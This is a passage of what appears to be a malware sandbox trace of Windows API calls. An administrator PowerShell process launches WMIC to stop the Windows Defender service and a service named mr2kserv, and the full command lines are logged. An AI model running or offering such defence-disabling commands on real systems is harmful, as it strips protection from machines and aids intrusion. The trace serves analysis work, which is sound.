ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0292.169] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0292.170] GetConsoleWindow () returned 0x302b8 [0292.175] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0292.175] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0292.176] CoTaskMemAlloc (cb=0x804) returned 0x7e29450 [0292.176] GetConsoleTitleW (in: lpConsoleTitle=0x7e29450, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0292.177] CoTaskMemFree (pv=0x7e29450) [0292.178] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e6c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4c52754 | out: lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice", lpProcessInformation=0x4c52754*(hProcess=0x964, hThread=0x9d0, dwProcessId=0x1230, dwThreadId=0x11f4)) returned 1 [0292.196] CloseHandle (hObject=0x9d0) returned 1 [0292.197] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0292.197] GetCurrentProcess () returned 0xffffffff [0292.197] GetCurrentProcess () returned 0xffffffff [0292.197] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x964, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0x9d0) returned 1 [0292.198] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0x9d0, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0295.209] CloseHandle (hObject=0x9d0) returned 1 [0295.210] GetExitCodeProcess (in: hProcess=0x964, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x0) returned 1 [0295.210] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0295.220] CloseHandle (hObject=0x964) returned 1 [0295.220] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0295.221] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0295.221] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0295.221] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0295.221] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0295.222] SetEvent (hEvent=0x83c) returned 1 [0295.222] SetEvent (hEvent=0x830) returned 1 [0295.222] SetEvent (hEvent=0x834) returned 1 [0295.222] SetEvent (hEvent=0x838) returned 1 [0295.222] SetEvent (hEvent=0x9c4) returned 1 [0295.222] SetEvent (hEvent=0x840) returned 1 [0295.222] SetEvent (hEvent=0x844) returned 1 [0295.222] SetEvent (hEvent=0x848) returned 1 [0295.222] SetEvent (hEvent=0x9cc) returned 1 [0295.222] SetEvent (hEvent=0x9c8) returned 1 [0295.223] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0295.226] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0295.228] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0x1e4a77ff, Data2=0xbe74, Data3=0x4900, Data4=([0]=0xb4, [1]=0x72, [2]=0x7d, [3]=0x48, [4]=0x39, [5]=0xcf, [6]=0x1e, [7]=0x4c))) returned 0x0 [0295.228] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=39026302333) returned 1 [0295.228] AmsiOpenSession () returned 0x0 [0295.228] AmsiScanString () returned 0x80070015 [0295.236] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=39027101559) returned 1 [0295.237] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ\x05") returned 0x0 [0295.237] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x86, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0295.237] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0295.237] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x86, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x86, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0295.237] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x87, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0295.237] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x86, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0295.237] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x87, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x87, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0295.238] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="ሰғ徠玤") returned 0x0 [0295.238] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0295.238] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0295.239] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0295.239] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0295.239] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0295.239] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0295.239] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0295.239] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0295.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0295.240] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0295.240] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0295.240] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0295.240] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0295.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0295.241] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0295.241] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0295.241] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0295.241] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0295.241] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0295.241] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0295.241] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0295.241] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0295.241] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0295.241] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0295.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0295.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0295.242] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0295.242] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0295.242] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0295.242] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0295.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0295.242] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0295.242] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0295.242] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0295.242] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0295.243] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0295.243] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0295.243] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0295.243] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0295.243] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0295.243] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0295.243] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0295.243] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0295.243] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0295.243] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0295.243] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x7e1c620 [0295.244] FindNextFileW (in: hFindFile=0x7e1c620, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0295.244] FindClose (in: hFindFile=0x7e1c620 | out: hFindFile=0x7e1c620) returned 1 [0295.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0295.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0295.244] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x20 [0295.244] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x88, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0295.244] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x87, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0295.244] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x88, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x88, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0295.246] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0295.247] GetConsoleWindow () returned 0x302b8 [0295.251] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0295.251] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0295.252] CoTaskMemAlloc (cb=0x804) returned 0x7e29450 [0295.252] GetConsoleTitleW (in: lpConsoleTitle=0x7e29450, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0295.253] CoTaskMemFree (pv=0x7e29450) [0295.253] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e6c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4c61de0 | out: lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice", lpProcessInformation=0x4c61de0*(hProcess=0x750, hThread=0x878, dwProcessId=0x6d0, dwThreadId=0xd44)) returned 1 [0295.266] CloseHandle (hObject=0x878) returned 1 [0295.266] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0295.267] GetCurrentProcess () returned 0xffffffff [0295.267] GetCurrentProcess () returned 0xffffffff [0295.267] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x750, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0x878) returned 1 [0295.267] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0x878, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0297.242] CloseHandle (hObject=0x878) returned 1 [0297.243] GetExitCodeProcess (in: hProcess=0x750, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x0) returned 1 [0297.244] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0297.247] 